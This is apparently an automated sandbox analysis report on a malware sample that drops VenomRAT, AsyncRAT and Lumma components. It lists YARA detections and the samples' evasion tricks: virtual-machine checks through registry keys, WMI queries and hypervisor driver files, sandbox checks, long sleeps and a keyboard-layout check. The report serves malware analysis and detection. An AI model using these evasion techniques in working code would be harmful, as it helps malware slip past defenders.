Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Check for Windows Defender sandbox

Source: C:\Users\user\AppData\Local\Temp\8EC7.exe

File Queried: C:\INTERNAL\__empty

Jump to behavior

Yara detected AsyncRAT

Source: Yara match	File source: 19.2.vm.exe.4e40000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.vm.exe.4e40000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.vm.exe.4e30000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.vm.exe.4e30000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000002.4121890771.0000000004E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.3209596948.0000000004E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected VenomRAT

Source: Yara match	File source: Process Memory Space: vm.exe PID: 2484, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vm.exe PID: 2004, type: MEMORYSTR

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\adjijwj	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\adjijwj	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\adjijwj	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\adjijwj	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\adjijwj	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\adjijwj	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Queries memory information (via WMI often done to detect virtual machines)

Source: C:\Windows\explorer.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\explorer.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_DiskDrive

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

Source: C:\Windows\explorer.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory

Query firmware table information (likely to detect VMs)

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	System information queried: FirmwareTableInformation

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	API/Special instruction interceptor: Address: 7FFE2220E814
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	API/Special instruction interceptor: Address: 7FFE2220D584
Source: C:\Users\user\AppData\Roaming\adjijwj	API/Special instruction interceptor: Address: 7FFE2220E814
Source: C:\Users\user\AppData\Roaming\adjijwj	API/Special instruction interceptor: Address: 7FFE2220D584

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe, 00000000.00000002.1718193186.00000000005F0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASWHOOKNY
Source: adjijwj, 00000003.00000002.1941695773.0000000000540000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASWHOOK
Source: vm.exe, 00000013.00000002.4121890771.0000000004E40000.00000004.08000000.00040000.00000000.sdmp, vm.exe, 0000001A.00000002.3209596948.0000000004E30000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: TASKMGR.EXE#PROCESSHACKER.EXE

Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Memory allocated: 1E000710000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Memory allocated: 1E01A290000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Memory allocated: 1E01DA80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Memory allocated: 15F3A620000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Memory allocated: 15F53FF0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Memory allocated: 150000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Memory allocated: 2900000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Memory allocated: 4900000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Memory allocated: 170000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Memory allocated: 2900000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Memory allocated: 4900000 memory reserve \| memory write watch

Source: C:\Windows\explorer.exe	File opened / queried: C:\Windows\System32\drivers\VBoxSF.sys	Jump to behavior
Source: C:\Windows\explorer.exe	File opened / queried: C:\Windows\System32\drivers\vmnet.sys	Jump to behavior
Source: C:\Windows\explorer.exe	File opened / queried: C:\Windows\System32\drivers\vmmouse.sys	Jump to behavior
Source: C:\Windows\explorer.exe	File opened / queried: C:\Windows\System32\vboxtray.exe	Jump to behavior
Source: C:\Windows\explorer.exe	File opened / queried: C:\Windows\System32\vboxhook.dll	Jump to behavior
Source: C:\Windows\explorer.exe	File opened / queried: C:\Windows\System32\drivers\VBoxGuest.sys	Jump to behavior
Source: C:\Windows\explorer.exe	File opened / queried: C:\Windows\System32\drivers\VBoxVideo.sys	Jump to behavior
Source: C:\Windows\explorer.exe	File opened / queried: C:\Windows\System32\drivers\vmci.sys	Jump to behavior
Source: C:\Windows\explorer.exe	File opened / queried: C:\Windows\System32\drivers\VBoxMouse.sys	Jump to behavior
Source: C:\Windows\explorer.exe	File opened / queried: C:\Windows\System32\vboxservice.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 413	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 2145	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 789	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 2128	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 880	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 873	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Window / User API: threadDelayed 2584	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7899
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1638

Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

Source: C:\Windows\explorer.exe TID: 6876	Thread sleep time: -214500s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6880	Thread sleep time: -78900s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6048	Thread sleep time: -34600s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6908	Thread sleep time: -32300s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7108	Thread sleep time: -50000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6876	Thread sleep time: -212800s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe TID: 4904	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe TID: 1516	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe TID: 2448	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe TID: 6828	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2248	Thread sleep time: -27670116110564310s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3408	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 4900	Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe TID: 4556	Thread sleep time: -75000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe TID: 4268	Thread sleep time: -210000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe TID: 6904	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystemProduct
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem

Source: C:\Windows\explorer.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM WIN32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\8EC7.exe

Code function: 7_2_00007FF641607000 GetKeyboardLayoutList followed by cmp: cmp r8d, 00000419h and CTI: je 00007FF6416071AFh

7_2_00007FF641607000

Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe

Code function: 20_2_6C87FBAE FindFirstFileExW,

20_2_6C87FBAE

Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe

Code function: 19_2_6C8CC1DF GetSystemInfo,VirtualAlloc,

19_2_6C8CC1DF

Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Thread delayed: delay time: 922337203685477

Source: explorer.exe, 00000001.00000000.1700000036.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000001.00000000.1699388658.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
Source: explorer.exe, 00000001.00000000.1699388658.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NECVMWar VMware SATA CD00\w
Source: explorer.exe, 00000001.00000000.1700000036.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000001.00000000.1696258763.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
Source: explorer.exe, 00000001.00000000.1700000036.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000001.00000000.1697734591.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTTAVMWare
Source: explorer.exe, 00000001.00000000.1699388658.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
Source: EF14.exe, 00000009.00000002.2570610433.00007FF71C180000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: runtime: sp=abi mismatchout of rangeCypro_MinoanMeetei_MayekPahawh_HmongSora_SompengSyloti_Nagrimultipathtcp127.0.0.1:53no such hostCIDR addressunknown portinvalid portgetaddrinfowtransmitfileGetConsoleCPnot pollableECDSA-SHA256ECDSA-SHA384ECDSA-SHA512SERIALNUMBERstringlengthContent-Typecontext.TODOtlsunsafeekmclose notifyremote errorc hs traffics hs trafficc ap traffics ap traffichttpmuxgo121PUSH_PROMISECONTINUATIONCookie.Valuecontent-typemax-forwardshttp2debug=1http2debug=2100-continueMulti-StatusNot ModifiedUnauthorizedI'm a teapotNot ExtendedproxyconnectMime-VersionX-ImforwardsX-Powered-Bybad Tc valuebad Th valuebad Tq valuebad Pq valuebad Td valuebad Ta valuedisplay-nameban-durationRemoveSignerGetDealLabelChangePeerIDTransferFromgotypesaliasRCodeSuccessRCodeRefusedinvalid baseInstAltMatchunexpected )altmatch -> anynotnl -> empty numberReadObjectCBdecode arraydecode sliceunknown type = struct { Content Type (sensitive)simple errordbl-sha2-256base32hexpadbase58flickrbase64urlpadbase256emojiavx5124fmapsavx512bitalgcaller errorPskModePlaineccsi_sha256PUNSUBSCRIBESUNSUBSCRIBE(database)s$Switch Proxy.fasthttp.gz.fasthttp.brAMDisbetter!AuthenticAMDCentaurHaulsGenuineIntelTransmetaCPUGenuineTMx86Geode by NSCVIA VIA VIA KVMKVMKVMKVMMicrosoft 